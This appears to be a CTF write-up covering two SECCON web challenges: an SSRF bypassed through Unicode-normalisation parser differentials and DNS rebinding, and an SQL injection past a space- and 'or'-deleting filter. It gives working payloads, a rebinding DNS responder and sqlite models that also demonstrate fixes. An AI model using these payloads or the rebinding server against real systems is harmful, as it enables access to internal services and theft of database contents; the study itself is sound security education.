1. Option-Cmd-U

Challenge description: No more "View Page Source"!


Opening the challenge shows an online "view page source" tool: you hand it a URL, the server fetches it and prints the result with highlight_string(). Look at index.php first; it carries the key hints in HTML comments:

<!-- src of this PHP script: /index.php?action=source -->
<!-- the flag is in /flag.php, which permits access only from internal network :-) -->
<!-- this service is running on php-fpm and nginx. see /docker-compose.yml -->

Start with /index.php?action=source. The key code is:

<?php
if ($_GET['action'] === "source"){
    highlight_file(__FILE__);
    die();
}
?>
<?php
if (isset($_GET['url'])){
    $url = filter_input(INPUT_GET, 'url');
    $parsed_url = parse_url($url);                        
    if($parsed_url["scheme"] !== "http"){
    // only http: should be allowed. 
        echo 'URL should start with http!';
    } 
    else if (gethostbyname(idn_to_ascii($parsed_url["host"], 0, INTL_IDNA_VARIANT_UTS46)) === gethostbyname("nginx")) {
    // local access to nginx from php-fpm should be blocked.
        echo 'Oops, are you a robot or an attacker?';
    } else {
    // file_get_contents needs idn_to_ascii(): https://stackoverflow.com/questions/40663425/
        highlight_string(file_get_contents(idn_to_ascii($url, 0, INTL_IDNA_VARIANT_UTS46),
            false,
            stream_context_create(array(
                'http' => array(
                    'follow_location' => false,
                    'timeout' => 2
                )
            ))));
    }
}
?>

Next, flag.php, requested directly from outside:

Forbidden.Your IP: 172.25.0.1

Then docker-compose.yml:

version: '3'
services:
    nginx:
        (...omitted...)
    php-fpm:
        (...omitted...)

Solution 1:
Unicode bypass (see Jonathan Birch's Black Hat USA 2019 talk "HostSplit: Exploitable Antipatterns in Unicode Normalization"). The check and the fetch operate on different strings: parse_url() sees the raw URL and only recognises ASCII delimiters, while idn_to_ascii() with UTS46 maps fullwidth look-alikes to ASCII before the request is made. So write one delimiter of the target URL as its fullwidth form (U+FF1A ： for ":", U+FF20 ＠ for "@", U+FF0F ／ for "/"; percent-encoded as %EF%BC%9A, %EF%BC%A0, %EF%BC%8F). parse_url() then treats that character as part of the host, idn_to_ascii() of this "host" does not resolve to nginx's address and the check passes, but idn_to_ascii() of the whole URL turns the character back into the plain delimiter and file_get_contents() fetches http://nginx/flag.php from inside the network. Three variants, each with the `:`, the `@` or the `/` before flag.php written as the fullwidth character:

  1. http://nginx:80/flag.php
  2. http://@nginx/flag.php
  3. http://nginx/flag.php
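To see the parser differential concretely, here is an added Python model of the check (not the challenge's PHP and not from the author). PHP's parse_url() host extraction is approximated with a regex, the UTS46 mapping step of idn_to_ascii() with NFKC plus case folding, and the lab's DNS with a constructed table in which nginx is 172.25.0.3 (all assumptions). It also shows the fix (map first, then validate the exact string that is fetched) and that Python's own urlsplit() rejects these netlocs outright since the CVE-2019-9636 fix.

```python
"""Model of the Option-Cmd-U check/fetch mismatch (added example, not the
challenge's own code). The lab DNS table and the UTS46 approximation are
assumptions made for this demo."""
import re
import unicodedata
from urllib.parse import urlsplit

# Constructed view of the challenge network: what gethostbyname() would return.
LAB_DNS = {"nginx": "172.25.0.3", "lamber.xyz": "203.0.113.10"}


def php_host(url):
    """Approximates parse_url(): scheme, then a host delimited only by the ASCII
    characters / ? # : and an optional user@ part. Fullwidth look-alikes are not
    delimiters, so they stay inside the "host"."""
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*)://(?:[^/?#@]*@)?([^/?#:]*)", url)
    return (m.group(1).lower(), m.group(2)) if m else (None, None)


def uts46_map(s):
    """Approximates the mapping step of idn_to_ascii(..., INTL_IDNA_VARIANT_UTS46):
    compatibility decomposition folds U+FF1A/U+FF20/U+FF0F to ASCII : @ / and
    upper case is lowered. Punycode of remaining non-ASCII labels is omitted."""
    return unicodedata.normalize("NFKC", s).casefold()


def gethostbyname(host):
    """PHP's gethostbyname() hands back its input unchanged when it cannot resolve."""
    return LAB_DNS.get(host, host)


def vulnerable_check(url):
    """The page's logic: validate the host of the RAW url, fetch the MAPPED url.
    Returns ("blocked", None), ("bad-scheme", None) or ("fetch", effective_url)."""
    scheme, host = php_host(url)
    if scheme != "http":
        return ("bad-scheme", None)
    if gethostbyname(uts46_map(host)) == gethostbyname("nginx"):
        return ("blocked", None)
    return ("fetch", uts46_map(url))


def hardened_check(url):
    """Fix for the differential: map first, then parse and validate the very
    string that will be fetched. (It still resolves the name twice, once here
    and once inside the fetch, so DNS rebinding needs a separate fix: connect
    to the address that was checked instead of resolving again.)"""
    mapped = uts46_map(url)
    scheme, host = php_host(mapped)
    if scheme != "http" or not host:
        return ("bad-scheme", None)
    if gethostbyname(host) == gethostbyname("nginx"):
        return ("blocked", None)
    return ("fetch", mapped)


def target_of(effective_url):
    """Which address the fetch would actually reach."""
    return gethostbyname(php_host(effective_url)[1])


def stdlib_rejects(url):
    """urllib.parse.urlsplit() refuses a netloc whose NFKC form contains a
    delimiter (the CVE-2019-9636 fix), i.e. it closes exactly this hole."""
    try:
        urlsplit(url)
        return False
    except ValueError:
        return True


PAYLOADS = [
    "http://nginx\uff1a80/flag.php",  # 1: fullwidth colon    (%EF%BC%9A)
    "http://\uff20nginx/flag.php",    # 2: fullwidth at sign  (%EF%BC%A0)
    "http://nginx\uff0fflag.php",     # 3: fullwidth solidus  (%EF%BC%8F)
]

if __name__ == "__main__":
    for url in ["http://nginx/flag.php"] + PAYLOADS:
        print(repr(url), vulnerable_check(url), hardened_check(url), stdlib_rejects(url))
```

Running it prints "blocked" for the plain URL and "fetch" with an effective URL of http://nginx:80/flag.php, http://@nginx/flag.php and http://nginx/flag.php for the three payloads, all of which reach nginx's address; hardened_check() blocks all three. The general lesson is to validate the representation that is actually used, never an earlier one.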


Solution 2:
flag.php answers with a Forbidden page that echoes the client address (172.25.0.1 from outside, typically the Docker network's gateway), so only a request that originates inside the compose network will do. Requesting it through the service and then brute-forcing the internal range 172.25.0.x through the url parameter, the response changed at 172.25.0.3. Since the check compares the resolved address with gethostbyname("nginx"), feeding addresses directly turns the "Oops, are you a robot or an attacker?" branch into an oracle for nginx's internal address.

Then use DNS rebinding. The hostname is resolved twice: once by gethostbyname() in the check and again by file_get_contents() for the actual request. Publish a name with two A records, one pointing at 172.25.0.3 and one at your own server (my_server is a placeholder for your domain):

localhost.my_server A 172.25.0.3
localhost.my_server A (my_server_IP_address)

When the check's lookup returns your server's address it passes, because that is not nginx's address, and when the fetch's lookup returns 172.25.0.3 the request reaches nginx from php-fpm's own internal address, which flag.php accepts. Which record each lookup gets depends on the order the resolver returns them, so repeat until both line up. Finally, request the page through your own domain and read the flag:
GET /?url=http://lamber.xyz/flag.php
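The following is an added example (not the author's DNS setup) of a minimal authoritative responder for the rebinding step, written in Python with only the standard library. The name localhost.lamber.xyz, the internal address 172.25.0.3 and the attacker address 203.0.113.10 are assumptions. It can answer either the way the page does, with both A records in one response, or with the classic TTL-0 alternation, and it includes the packet builders and parsers needed to check what it sends.

```python
"""Minimal rebinding DNS responder (added example, not the author's setup).
NAME is the attacker-controlled name, INTERNAL_IP the nginx address found
above, ATTACKER_IP the attacker's server; all three are assumptions."""
import itertools
import socket
import struct

NAME = "localhost.lamber.xyz"
INTERNAL_IP = "172.25.0.3"
ATTACKER_IP = "203.0.113.10"   # documentation range, stands in for the real server


def build_query(name, qtype=1, tid=0x1234):
    """Build a standard recursive A query (used to exercise the responder)."""
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return struct.pack("!HHHHHH", tid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def parse_name(data, off):
    """Read an uncompressed label sequence; return (name, offset after it)."""
    labels = []
    while True:
        n = data[off]
        off += 1
        if n == 0:
            return ".".join(labels).lower(), off
        labels.append(data[off:off + n].decode("ascii"))
        off += n


def parse_question(data):
    """Return (qname, qtype, offset just past the first question)."""
    if struct.unpack("!H", data[4:6])[0] < 1:
        raise ValueError("no question section")
    qname, off = parse_name(data, 12)
    qtype, _qclass = struct.unpack("!HH", data[off:off + 4])
    return qname, qtype, off + 4


def build_response(query, ips, ttl=0):
    """Answer the query's name with one A record per address in ips. TTL 0 asks
    caching resolvers to re-query on the next lookup. Non-A queries get NOERROR
    with an empty answer section."""
    qname, qtype, qend = parse_question(query)
    answers = ips if qtype == 1 else []
    header = query[:2] + struct.pack("!HHHHH", 0x8180, 1, len(answers), 0, 0)
    rrs = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
                   for ip in answers)
    return header + query[12:qend] + rrs


def parse_answers(resp):
    """Return the A-record addresses in a response, in wire order."""
    ancount = struct.unpack("!H", resp[6:8])[0]
    _qname, _qtype, off = parse_question(resp)
    ips = []
    for _ in range(ancount):
        off += 2  # compression pointer back to the question name
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        if rtype == 1:
            ips.append(socket.inet_ntoa(resp[off:off + rdlen]))
        off += rdlen
    return ips


class Rebinder:
    """Two strategies for the same race. "both": the page's approach, one answer
    carrying both records, gethostbyname() takes whichever the resolver lists
    first. "alternate": classic rebinding, every lookup flips the answer."""

    def __init__(self, name=NAME, strategy="alternate"):
        self.name = name.lower()
        self.strategy = strategy
        self.flip = itertools.cycle([[ATTACKER_IP], [INTERNAL_IP]])

    def answer(self, query):
        qname, _qtype, _ = parse_question(query)
        if qname != self.name:
            return build_response(query, [])  # not our name: empty answer
        ips = [INTERNAL_IP, ATTACKER_IP] if self.strategy == "both" else next(self.flip)
        return build_response(query, ips)


def serve(bind=("0.0.0.0", 53), strategy="alternate"):
    """Run as the authoritative server for NAME (needs an NS delegation)."""
    rb = Rebinder(strategy=strategy)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        data, peer = sock.recvfrom(512)
        sock.sendto(rb.answer(data), peer)


if __name__ == "__main__":
    serve()
```

Delegate the name to the host running serve() and repeat the ?url= request until gethostbyname() in the check gets the attacker address while the lookup inside file_get_contents() gets 172.25.0.3; several tries are normal. A TTL of 0 is not honoured by every caching resolver, which is why alternating answers are more dependable than relying on a cache expiring.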

2. web_search

Challenge description: Get a hidden message! Let's find a hidden message using the search system on the site.

Routine SQL injection probing (the part in parentheses is how the site echoes the filtered input):
input: 1 --> (1) text
input: 1' --> (1') Error
input: 1'or 1=1# --> (1'1=1#) Error --> spaces and "or" are filtered, by plain deletion
input: 1'oorr/**/1=1# --> (1'or/**/1=1#) The flag is "SECCON{Yeah_Sqli_Success_" ... well, the rest of flag is in "flag" table. Try more! --> doubling "or" (a single-pass deletion leaves one "or" behind) and using /**/ comments in place of spaces bypasses the filter and yields the first half of the flag.

Now query the flag table. While doing so it turned out that commas are filtered as well, so the padding columns the UNION needs cannot be written as 1,flag,1; instead three one-column derived tables are JOINed, which concatenates their columns without a single comma and pads the flag column to the width of the original SELECT.
Final payload:
oorr/**/1=0/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)/**/AS/**/a/**/JOIN/**/(SELECT/**/*/**/from/**/flag)AS/**/b/**/JOIN/**/(SELECT/**/1)/**/ AS/**/c;# --> You_Win_Yeah}
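An added sqlite3 model of the injection (not the challenge's code): the filter is the one observed above (spaces deleted, "or" deleted in one pass), while the query shape, the table names and the filter's case handling are assumptions, and MySQL's # comment is replaced by -- because SQLite has no # comment. It shows why doubling defeats a single-pass deletion, why the comma-free JOIN yields exactly the three columns the UNION must match, and that a bound parameter makes the whole filter unnecessary.

```python
"""sqlite3 model of the web_search injection (added example, not the
challenge's code). Table names, query shape and filter case handling are
assumptions; the filter behaviour is the one observed on the page."""
import sqlite3


def waf(user_input):
    """Observed filter: every space deleted, the substring 'or' deleted in one
    pass (so 'oorr' collapses to 'or'). Case-sensitivity is assumed."""
    return user_input.replace(" ", "").replace("or", "")


def make_db():
    """Constructed data: a 3-column articles table and the 1-column flag table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'hello', 'world');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('You_Win_Yeah}');
    """)
    return db


def search_vulnerable(db, user_input):
    """Assumed query shape: the filtered input is pasted into a quoted literal.
    Returns the rows, or the string 'Error' like the probe table above."""
    sql = "SELECT id, title, body FROM articles WHERE title = '%s'" % waf(user_input)
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "Error"


def search_fixed(db, user_input):
    """The real fix: a bound parameter; the blacklist becomes irrelevant."""
    return db.execute("SELECT id, title, body FROM articles WHERE title = ?",
                      (user_input,)).fetchall()


# Commas are filtered, so the three columns the UNION must match are produced by
# JOINing three one-column derived tables instead of writing 1,flag,1.
# SQLite has no '#' comment, so the page's ';#' tail is written as '--'.
PAYLOAD = ("1'oorr/**/1=0/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)/**/AS/**/a"
           "/**/JOIN/**/(SELECT/**/*/**/from/**/flag)/**/AS/**/b"
           "/**/JOIN/**/(SELECT/**/1)/**/AS/**/c--")

if __name__ == "__main__":
    db = make_db()
    for probe in ["1", "1'", "1'or 1=1--", "1'oorr/**/1=1--", PAYLOAD]:
        print(repr(waf(probe)), "->", search_vulnerable(db, probe))
    print("parameterised:", search_fixed(db, PAYLOAD))
```

The probe 1'or 1=1-- becomes '1'1=1-- after filtering and is a syntax error, exactly as on the page; 1'oorr/**/1=1-- survives as '1'or/**/1=1-- and returns every row; the final payload returns the flag row padded with the two constant columns, and the parameterised query returns nothing for it.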

Last modification: January 7th, 2020 at 11:49 pm